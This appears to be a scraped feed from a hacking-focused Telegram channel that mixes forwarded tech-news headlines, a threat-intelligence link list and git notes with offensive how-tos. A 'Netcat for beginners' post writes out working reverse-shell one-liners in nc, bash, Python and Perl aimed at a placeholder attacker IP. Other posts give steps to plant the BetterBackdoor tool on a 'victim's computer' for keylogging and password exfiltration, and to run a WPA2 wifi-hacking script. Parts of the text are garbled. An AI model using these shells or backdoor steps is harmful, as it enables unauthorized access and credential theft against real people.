UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.7K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Netcat FOR BEGINERS :
Netcat is a Unix utility that allows you to establish TCP and UDP connections, receive data from there, and transfer it.

Despite its usefulness and simplicity, many do not know how to use it and undeservedly bypass it.

With this utility, you can perform some of the penetration testing steps.

This can be useful when there are no packages installed on the attacked machine (or will attract attention), there are restrictions (for example, IoT / Embedded devices), etc.

What can be done with netcat:

Scan ports;
Forward ports;
Collect service banners;
Watch listening ports (binding for reverse connection);
Download and upload files;
Display raw HTTP content;
Create a mini chat.
In general, some unix utilities can be replaced with netcat, so this tool can be thought of as a kind of harvester for performing certain tasks.
$ nc -nvlp 443
This command opens TCP port 443 on all interfaces, and this port will be used further in the examples.
Netcat

$ nc -e / bin / sh YOUR-IP 443
In my opinion, this is the most classic example of a reverse shell, but in modern realities netcat may simply not be installed on the server.

Bash

$ bash -i> & / dev / tcp / YOUR-IP / 443 0> & 1
* And this example, in my opinion, is the most dangerous, because in fact, apart from the bash interpreter (sh, ksh, zsh, etc.), it does not require any additional software, but only access to the dev subsystem.
Python
$ python -c 'import socket, subprocess, os; s = socket.socket (socket.AF_INET, socket.SOCK_STREAM); s.connect ((" YOUR-IP ", 443 )); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p = subprocess.call ([β€œ/ bin / sh”, β€œ- i”]); '
* Modern distributions of Python are almost always present, and the standard library is sufficient to do the reverse linking.
Perl

$ perl -e 'use Socket; $ i = " YOUR-IP "; $ p = 443; socket (S, PF_INET, SOCK_STREAM, getprotobyname (β€œtcp”)); if (connect (S, sockaddr_in ($ p, inet_aton ($ i)))) {open (STDIN, β€œ> & S”); open (STDOUT, β€œ> & S”); open (STDERR, β€œ> & S”); exec (β€œ/ bin / sh -i”); }; '
* Like Python, almost all modern Linux distributions have Perl on their system.

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Enjoy Today's list of free pro Android applications and games(Google Play) of the day is amazing.
#Updates
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘BetterBackdoor can create and control a backdoor.

F E A T U R E S :

Execute command line commands
Run PowerShell scripts
Run DuckyScripts to input keystrokes
Exfiltrate files based on extension
Exfiltrate Microsoft Edge and WiFi Passwords
Send and receive files to the victim's computer
Run KeyLogger
Get a screenshot of the victim's computer
Get text copied to victim's clipboard
Get the contents of the victim's file (cat)
This backdoor uses a client-server socket connection for communication.
The attacker starts the server and the victim connects to that server as a client.
Once the connection is established, commands can be sent to the client to control the backdoor.
To create a backdoor, BetterBackdoor:

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) Download: https://github.com/ThatcherDev/


1) Create "run.jar", the backdoor jar file, and copy it to the "backdoor" directory.

2) D obavte text file containing IPv4-address of the server to the Β«run.jarΒ».
Optionally copy the Java Runtime Environment to "backdoor" and create a batch file "run.bat" to run the backdoor in the packaged Java Runtime Environment.tterBackdoor:

3) To run the backdoor on the victim's computer, transfer all files from the "backdoor" directory to the victim's computer.

4) If the JRE is packaged with a backdoor, run run.bat, otherwise run run.jar.

5) This will launch a backdoor on the victim's computer.

6) Once launched, to control the backdoor, you must go back to BetterBackdoor and run option 1 at startup, connected to the same Wi-Fi network as the victim's computer.

(don't clone our tips)
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
In Europe, Samsung is entering the 5G race to overtake Huawei, but consumers have big reservations
#Technologies
Forwarded from UNDERCODE NEWS
To try live streaming, Walmart partnered up with TikTok, recommending fashion designer items.
#Updates
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Recommended free Threat intelligence and IOC resources

* [FireEye IOCs](https://github.com/fireeye/iocs) - Indicators of Compromise
shared publicly by FireEye.

* [FireHOL IP Lists](https://iplists.firehol.org/) - Analytics for 350+ IP lists
with a focus on attacks, malware and abuse. Evolution, Changes History,
Country Maps, Age of IPs listed, Retention Policy, Overlaps.

* [HoneyDB](https://riskdiscovery.com/honeydb) - Community driven honeypot sensor data collection and aggregation.

* [hpfeeds](https://github.com/rep/hpfeeds) - Honeypot feed protocol.

* [Infosec - CERT-PA lists](https://infosec.cert-pa.it/analyze/statistics.html) ([IPs](https://infosec.cert-pa.it/analyze/listip.txt) - [Domains](https://infosec.cert-pa.it/analyze/listdomains.txt) - [URLs](https://infosec.cert-pa.it/analyze/listurls.txt)) - Blocklist service.

* [InQuest REPdb](https://labs.inquest.net/repdb) - Continuous aggregation of IOCs from a variety of open reputation sources.

* [InQuest IOCdb](https://labs.inquest.net/iocdb) - Continuous aggregation of IOCs from a variety of blogs, Github repos, and Twitter.

* [Internet Storm Center (DShield)](https://isc.sans.edu/) - Diary and

* [SystemLookup](https://www.systemlookup.com/) - SystemLookup hosts a collection of lists that provide information on
the components of legitimate and potentially unwanted programs.

* [ThreatMiner](https://www.threatminer.org/) - Data mining portal for threat
intelligence, with search.

* [threatRECON](https://threatrecon.co/) - Search for indicators, up to 1000
free per month.



▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Coronavirus: Google postpones jobs' return until September.
#international
Forwarded from UNDERCODE NEWS
More than 70% of enterprises have faced assaults on endpoints and IoT devices in 2020.
#Analytiques
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

Git tips:

The hooks directory contains client or server hook scripts, which are automatically executed under specific operations.

info contains a global exclusion file, which can be ignored by the configuration file

logs save log information

The objects directory stores all data content, and the local version repository is placed

The refs directory stores a pointer (branch) to the commit object of the data

The config file contains project-specific configuration options
description is used to display the description of the warehouse

The HEAD file indicates the branch that is currently checked out
index Temporary area data
Remember: Do not manually modify the contents of the .git folder*

Work area (code editing area): represents the local development code
Temporary storage area (modification to be submitted area): represents the address of the temporary storage code of the local warehouse

Warehouse area (code storage area): representative code enters local version control

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
The smartphone with the largest battery in the family has been launched by Xiaomi.
#Technologies
Forwarded from UNDERCODE NEWS
Android: Lightning-speed writing is no longer a concern.
#Updates
Forwarded from UNDERCODE NEWS
Apps for finance: the latest to get on your mobile.
#Updates
Forwarded from UNDERCODE NEWS
Official website data for the National Bank PS5 launch countdown has been revised.
#Technologies
wpa2 wifi hacking :

1)pkg update && pkg upgrade

2)pkg install bash

3) pkg install git

4) git clone https://github.com/Anonymous3-SIT/wifi-hacker

5) cd wifi-hacker

6)ls

7) bash wifi-hacker.sh

8) choose otption

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Apple changes trade-in rates for goods, iPad/Watch raises, Mac sinks
#international
Forwarded from UNDERCODE NEWS
LG unveils thin and light laptop Gram 16.
#Technologies